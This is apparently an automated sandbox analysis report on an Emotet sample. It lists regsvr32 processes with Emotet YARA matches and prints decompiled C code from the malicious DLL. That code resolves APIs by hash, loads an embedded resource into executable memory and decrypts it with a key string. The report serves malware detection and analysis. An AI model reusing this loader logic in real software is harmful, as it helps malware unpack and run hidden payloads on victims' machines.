Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2272, Parent PID: 2164

General

Target ID:	16
Start time:	16:19:10
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Gcoddegjb\etpu.msa"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.787004594.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.786980121.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2676, Parent PID: 2272

General

Target ID:	17
Start time:	16:19:15
Start date:	02/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo"
Imagebase:	0xd50000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.982437930.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.982478205.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 668, Parent PID: 1532COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.7%
Total number of Nodes:	229
Total number of Limit Nodes:	16

Executed Functions

Function 10007DD4 Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 375
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E10007DD4(void* __ebx, void* __edi, void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				char _v52;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				signed int _v84;
				void* _v88;
				int _v92;
				struct HINSTANCE__* _v96;
				void* _v100;
				void* __ebp;
				signed int _t80;
				void* _t86;
				short _t90;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				long _t122;
				signed int _t123;
				void* _t124;
				void* _t126;
				signed int _t127;
				intOrPtr _t138;
				signed int _t140;
				void* _t157;
				intOrPtr* _t158;
				signed int _t179;
				signed int _t183;
				short _t198;
				signed int _t201;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				void* _t220;
				signed int _t223;
				void* _t240;
				struct HRSRC__* _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t256;
				signed int _t258;
				signed int _t259;
				signed int _t274;
				void* _t282;

				_t239 = __esi;
				_t219 = __edi;
				_t156 = __ebx;
				_t80 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t80 ^ _t274;
				_v96 = _a4;
				_t84 = _a8 != 1;
				_t280 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t86 = 1;
				} else {
					if(L10001361(_t84, __ebx, __esi, _t280) != 0) {
						_push(0x10098b28);
						E10048578(__ebx, _t208, __edi, __esi, __eflags);
						_t86 = 0;
						__eflags = 0;
					} else {
						_t90 = 0x6c;
						_t220 = 0;
						_t198 = 0x64;
						_v70 = _t90;
						_v60 = _t90;
						_v58 = _t90;
						_v22 = _t90;
						_v20 = _t90;
						_v14 = _t90;
						_v12 = _t90;
						_v36 = _t90;
						_v34 = _t90;
						 *0x100b8250 = 0;
						 *0x100b8254 = 0;
						 *0x100b8258 = 0;
						 *0x100b8260 = 0;
						 *0x100b825c = 0;
						 *0x100b8264 = 0;
						 *0x100b8268 = 0;
						_v80 = 0x6b;
						_v78 = 0x65;
						_v76 = 0x72;
						_v74 = 0x6e;
						_v72 = 0x65;
						_v68 = 0x33;
						_v66 = 0x32;
						_v64 = 0x2e;
						_v62 = _t198;
						_v56 = 0;
						_v28 = 0x6e;
						_v26 = 0x74;
						_v24 = _t198;
						_v18 = 0x2e;
						_v16 = _t198;
						_v10 = 0;
						_v52 = 0x6d;
						_v50 = 0x73;
						_v48 = 0x76;
						_v46 = 0x63;
						_v44 = 0x72;
						_v42 = 0x74;
						_v40 = 0x2e;
						_v38 = _t198;
						_v32 = 0;
						_t240 = L10001497();
						_v84 = L10001497();
						_t42 =  &_v52; // 0x6d
						_t157 = L10001497();
						_t97 = L100013ED();
						 *0x100bc0a4 = _t97;
						_t98 = L100013ED();
						 *0x100bc0a0 = _t98;
						_t99 = L100013ED();
						 *0x100bc094 = _t99;
						_t100 = L100013ED();
						 *0x100bc084 = _t100;
						 *0x100bc098 = L100013ED();
						_t102 = L100013ED();
						 *0x100bc0b0 = _t102;
						_t103 = L100013ED();
						 *0x100bc05c = _t103;
						_t104 = L100013ED();
						 *0x100bc060 = _t104;
						_t105 = L100013ED();
						 *0x100bc06c = _t105;
						_t106 = L100013ED();
						 *0x100bc088 = _t106;
						_t107 = L100013ED();
						 *0x100bc080 = _t107;
						_t108 = L100013ED();
						 *0x100bc07c = _t108;
						_t109 = L100013ED();
						 *0x100bc08c = _t109;
						_t110 = L100013ED();
						 *0x100bc0b4 = _t110;
						_t111 = L100013ED();
						 *0x100bc070 = _t111;
						_t112 = L100013ED();
						 *0x100bc068 = _t112;
						_t113 = L100013ED();
						 *0x100bc0ac = _t113;
						_t114 = L100013ED();
						 *0x100bc0a8 = _t114;
						_t115 = L100013ED();
						 *0x100bc090 = _t115;
						_t116 = L100013ED();
						 *0x100bc064 = _t116;
						_t158 = L100013ED();
						 *0x100bc09c = _t158;
						_t118 = L100013ED();
						 *0x100bc078 = _t118;
						_t119 = L100013ED();
						 *0x100bc074 = _t119;
						_t241 =  *_t158(_v96, 0x18db, 0x10098b50, _t240, 0xe498a819, _t240, 0x38fc338c, _t240, 0x13eaa9b, _t240, 0x91bc62bf, _t240, 0x14b15953, _t240, 0x8d7cfac7, _t240, 0x16723a2f, _v84, 0x13c73337, _t240, 0xb279ad6e, _t240, 0xf3f7e5b8, _t240, 0x21fc0ac3, _t240, 0x1f34d42c, _t240, 0xe8b443c4, _t240, 0x4978d8bb, _t240, 0x1e0f72a8, _t240, 0x375fda65, _t157, 0x235d8184, _t157, 0x23b57d89, _t157, 0xc55813b, _t157, 0xafc6405d, _t157, 0x9559310e, _t157, 0x22f53faf, _t157, 0x21ad3fb3, _t42,  &_v28,  &_v80, __edi, __esi, __ebx);
						_v100 = LoadResource(_v96, _t241);
						_t122 = SizeofResource(_v96, _t241);
						_t282 =  *0x100bc06c - _t220; // 0x74f44d2f
						_v92 = _t122;
						if(_t282 == 0) {
							_t209 =  *0x100b8260; // 0x0
							_t242 =  *0x100b825c; // 0x0
							_t123 =  *0x100b8254; // 0x0
							_t201 =  *0x100b8264; // 0x0
							_t223 =  *0x100b8258; // 0x0
							_t244 =  *0x100b825c; // 0x0
							_t245 =  *0x100b8250; // 0x0
							_t61 = _t201 + 0x2000; // -269181532
							_t220 = 0;
							__eflags = 0;
							_t124 = VirtualAlloc(0, _v92, ((_t201 * _t223 + _t244 * _t245 - _t209) * _t123 - _t201) *  *0x100b8258 + (_t123 - _t245 + 0x00000001) * _t209 -  *0x100b825c + _t61 | 0x00001000 + ((1 -  *0x100b8258) * _t201 - _t123 * _t123 -  *0x100b8250 + _t209) * 0x00000005, ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + 0x40);
						} else {
							_t205 =  *0x100b825c; // 0x0
							_t259 =  *0x100b8250; // 0x0
							_t206 = _t205 * 3;
							_t140 =  *0x100b8258; // 0x0
							_t214 =  *0x100b8254; // 0x0
							_v84 = _t140 * 3;
							_v88 = _t206;
							_t207 =  *0x100b8260; // 0x0
							_t54 = _t207 + 3; // 0x3
							_t124 =  *0x100bc06c(0xffffffff, 0, _v92, ((_v84 - _t214 * 0x00000003) *  *0x100b8264 + 0x00000009) *  *0x100b8250 + (_t214 * 0x00000003 - _v84 - 0x00000009) * _t207 - _v88 + 0x00001000 | (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207 + (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207, (_t259 * 3 - _t206) * _t214 - _t207 * 6 + 0x40, 0); // executed
						}
						_v88 = _t124;
						memcpy(_t124, _v100, _v92);
						_t126 = malloc(0x57c0);
						_t204 =  *0x100b8250; // 0x0
						_t210 =  *0x100b8254; // 0x0
						_t179 =  *0x100b8254; // 0x0
						_v84 = _t126;
						_t127 =  *0x100b8258; // 0x0
						_t212 =  *0x100b825c; // 0x0
						_t208 =  *0x100b8264; // 0x0
						_t183 =  *0x100b8260; // 0x0
						_t256 =  *0x100b825c; // 0x0
						_t258 =  *0x100b8260; // 0x0
						L10001082();
						L1000145B();
						 *0x100bc094(_v84, _v84, _v88, _v92, (_t127 * 3 - _t208 + _t258 +  *0x100b8254 + _t204) * 3 + _v84, ((_t183 - _t208 - _t127 + 1) *  *0x100b8254 - _t256 + _t256 + _t208 + _t258 + _t204) * 4 + "ioJWT8ckiz9iT>_KLO0FiY95u@GjVFR*hl8<d3ewW+Da)gagIMNfn+<3?MyG&T4KLEuy^d?pfZ<7FMkEHD^sY>KINeVpH)kZ_cgUYXSt7c+$o3HN__lU?jXl", ((1 - _t204) * _t127 - _t210 * _t204 + _t212 *  *0x100b8260) * 3 + (_t179 * 3 - 3) * _t208 + 0x79);
						_t138 = L100010D2(_v88, _v92);
						 *0x100bc0bc = _t138;
						 *0x100bc0b8(_v96);
						_pop(_t219);
						_t239 = 1;
						_t156 = _t220;
						goto L6;
					}
				}
				return E1004763E(_t86, _t156, _v8 ^ _t274, _t208, _t219, _t239);
			}

0x10007dd4
0x10007dd4
0x10007dd4
0x10007dda
0x10007de1
0x10007de7
0x10007ded
0x10007ded
0x10007dee
0x10008305
0x10008307
0x10007df4
0x10007dfb
0x1000830a
0x1000830f
0x10008315
0x10008315
0x10007e01
0x10007e06
0x10007e07
0x10007e0b
0x10007e0c
0x10007e10
0x10007e14
0x10007e18
0x10007e1c
0x10007e20
0x10007e24
0x10007e28
0x10007e2c
0x10007e34
0x10007e3a
0x10007e40
0x10007e46
0x10007e4c
0x10007e52
0x10007e58
0x10007e5e
0x10007e64
0x10007e6a
0x10007e70
0x10007e76
0x10007e7c
0x10007e82
0x10007e88
0x10007e8e
0x10007e92
0x10007e96
0x10007e9c
0x10007ea2
0x10007ea6
0x10007eac
0x10007eb0
0x10007eb4
0x10007eba
0x10007ec0
0x10007ec6
0x10007ecc
0x10007ed2
0x10007ed8
0x10007ede
0x10007ee2
0x10007eeb
0x10007ef6
0x10007ef9
0x10007f02
0x10007f0a
0x10007f15
0x10007f1a
0x10007f25
0x10007f2a
0x10007f35
0x10007f3a
0x10007f45
0x10007f4f
0x10007f5a
0x10007f65
0x10007f6a
0x10007f78
0x10007f7d
0x10007f88
0x10007f8d
0x10007f98
0x10007f9d
0x10007fa8
0x10007fad
0x10007fb8
0x10007fbd
0x10007fc8
0x10007fcd
0x10007fd8
0x10007fdd
0x10007fe8
0x10007fed
0x10007ffd
0x10008002
0x1000800d
0x10008012
0x1000801d
0x10008022
0x1000802d
0x10008032
0x1000803d
0x10008042
0x1000804d
0x10008057
0x1000805f
0x10008065
0x10008070
0x10008075
0x1000808a
0x10008091
0x100080a1
0x100080a4
0x100080aa
0x100080b0
0x100080b3
0x10008165
0x1000816b
0x10008171
0x1000817f
0x1000818f
0x1000819a
0x100081b6
0x100081e8
0x10008210
0x10008210
0x10008213
0x100080b9
0x100080b9
0x100080bf
0x100080c5
0x100080c8
0x100080d0
0x100080de
0x100080e1
0x100080e4
0x10008127
0x1000815a
0x1000815a
0x1000821c
0x10008223
0x1000822e
0x10008234
0x1000823a
0x10008240
0x1000824f
0x10008252
0x1000825e
0x10008270
0x10008280
0x10008296
0x100082a2
0x100082c7
0x100082d5
0x100082dd
0x100082e9
0x100082f7
0x100082fc
0x10008302
0x10008303
0x10008304
0x00000000
0x10008304
0x10007dfb
0x10008322

APIs

LoadResource.KERNEL32(?,00000000), ref: 10008097
SizeofResource.KERNEL32(?,00000000), ref: 100080A4
VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?,-00000040,00000000), ref: 1000815A
VirtualAlloc.KERNEL32(00000000,?,-100B625C,?), ref: 10008213
memcpy.MSVCRT ref: 10008223
malloc.MSVCRT ref: 1000822E
??3@YAXPAX@Z.MSVCRT ref: 100082DD
_printf.LIBCMT ref: 1000830F

Strings

r, xrefs: 10007E6A
v, xrefs: 10007EC0
., xrefs: 10007E88
., xrefs: 10007EA6
n, xrefs: 10007E96
n, xrefs: 10007E70
t, xrefs: 10007ED2
e, xrefs: 10007E64
mvr., xrefs: 10007EF9, 10007EFC
2, xrefs: 10007E82
., xrefs: 10007ED8
c, xrefs: 10007EC6
3, xrefs: 10007E7C
t, xrefs: 10007E9C
k, xrefs: 10007E5E
e, xrefs: 10007E76
r, xrefs: 10007ECC

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocResourceVirtual$??3@LoadNumaSizeof_printfmallocmemcpy
String ID: .$.$.$2$3$c$e$e$k$mvr.$n$n$r$r$t$t$v
API String ID: 414098479-1080197306
Opcode ID: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
Instruction ID: 8a749b35a92ac8894742e7b36e387fd2e7c82a0fcd8bab04e5032650b4ed148f
Opcode Fuzzy Hash: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
Instruction Fuzzy Hash: 6AE15C7A9103289FEB04DFF9CDC59C9BBB9FF98340B01562AE404AB275E7B05A04CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10020650 Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10020650() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x100bdc5c
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x320cb0
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = L10001311(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = L10001311(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10049170(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x320cb0
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100b84e8;
							L10048E48( &_v28, 0x100afe38);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x100b8580;
							L10048E48( &_v36, 0x100afeec);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x100b8618;
							L10048E48( &_v44, 0x100aff30);
							asm("int3");
							_push(4);
							E1004764D(0x1008dd26, _t69, _t82, _t86);
							_t78 = E10020454(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1001DB72(_t78);
							}
							return E10047725(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x320cb0
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x320cb0
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x320cb0
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x10020650
0x10020651
0x10020652
0x10020654
0x10020656
0x10020656
0x1002065b
0x1002065f
0x10020665
0x10020665
0x10020668
0x10020668
0x1002066d
0x1002067c
0x1002067e
0x1002067f
0x10020681
0x1002069e
0x1002069e
0x1002069e
0x100206a1
0x100206a1
0x100206a4
0x100206a6
0x100206c4
0x100206c7
0x100206d5
0x100206db
0x100206de
0x100206a8
0x100206ab
0x100206b1
0x100206b5
0x100206b5
0x100206e4
0x100206e6
0x10020713
0x10020715
0x1002071c
0x10020726
0x1002072e
0x10020731
0x00000000
0x100206e8
0x100206e8
0x100206e8
0x100206eb
0x100206ed
0x100206f7
0x100206f7
0x10020701
0x1000a035
0x1000a036
0x1000a038
0x1000a042
0x1000a049
0x1000a04e
0x1000a04f
0x1000a050
0x1000a052
0x1000a05c
0x1000a063
0x1000a068
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1
0x10020683
0x10020683
0x10020686
0x10020686
0x10020689
0x10020689
0x1002068c
0x00000000
0x00000000
0x1002068e
0x1002068f
0x10020692
0x10020694
0x00000000
0x00000000
0x00000000
0x10020694
0x10020696
0x10020698
0x00000000
0x00000000
0x00000000
0x00000000
0x10020698
0x1002066f
0x1002066f
0x1002066f
0x10020672
0x10020676
0x10020734
0x10020734
0x10020734
0x10020737
0x10020739
0x1002073c
0x1002073c
0x1002073f
0x10020746
0x10020749
0x10020749
0x1002074c
0x1002074f
0x10020752
0x1002075f
0x00000000
0x00000000
0x00000000
0x10020676

APIs

EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 1002065F
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206B5
GlobalHandle.KERNEL32(00320CB0), ref: 100206BE
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206C7
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100206DE
GlobalHandle.KERNEL32(00320CB0), ref: 100206F0
GlobalLock.KERNEL32 ref: 100206F7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10020701
GlobalLock.KERNEL32 ref: 1002070D
_memset.LIBCMT ref: 10020726
LeaveCriticalSection.KERNEL32(?,00000058,10006BB6), ref: 10020752

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
Instruction ID: af271aca2a9668a8b962bf0fefcffd69e55be94dc5def31f8c145bf6bfeea780
Opcode Fuzzy Hash: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
Instruction Fuzzy Hash: 5A31BA756043059FE324CF34DD8CA9AB7EAFB85240B114A6EF993C3662EB70F8448B10

Uniqueness

Uniqueness Score: -1.00%

Function 100470E9 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E100470E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x100b59b0);
				_t8 = E100491EC(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10049231(_t8);
				}
				if( *0x100bff64 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x100be104, 0, ??); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10049097(_t31);
						 *_t10 = E1004905C(GetLastError());
					}
					goto L9;
				}
				L1004ED25(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = L1004EE41(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					L1004EE6C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1004713F();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x100470e9
0x100470eb
0x100470f0
0x100470f5
0x100470fa
0x10047171
0x10047176
0x10047176
0x10047103
0x10047148
0x10047149
0x10047151
0x10047157
0x10047159
0x1004715b
0x1004716e
0x10047170
0x00000000
0x10047159
0x10047107
0x1004710d
0x10047112
0x10047118
0x1004711d
0x1004711f
0x10047120
0x10047121
0x10047127
0x10047128
0x1004712f
0x10047138
0x00000000
0x1004713a
0x1004713a
0x00000000
0x1004713a

APIs

__lock.LIBCMT ref: 10047107

Part of subcall function 1004ED25: __mtinitlocknum.LIBCMT ref: 1004ED39
Part of subcall function 1004ED25: __amsg_exit.LIBCMT ref: 1004ED45
Part of subcall function 1004ED25: EnterCriticalSection.KERNEL32(00000001,00000001,?,10051765,0000000D,100B5E08,00000008,10051857,00000001,?,?,00000001,?,?,10048D8A,00000001), ref: 1004ED4D

___sbh_find_block.LIBCMT ref: 10047112
___sbh_free_block.LIBCMT ref: 10047121
HeapFree.KERNEL32(00000000,?,100B59B0), ref: 10047151
GetLastError.KERNEL32(?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10047162

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
Instruction ID: eb16438e638307e8988ba5fffe0d66e953f3cb3c88f18f150f3232e091455397
Opcode Fuzzy Hash: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
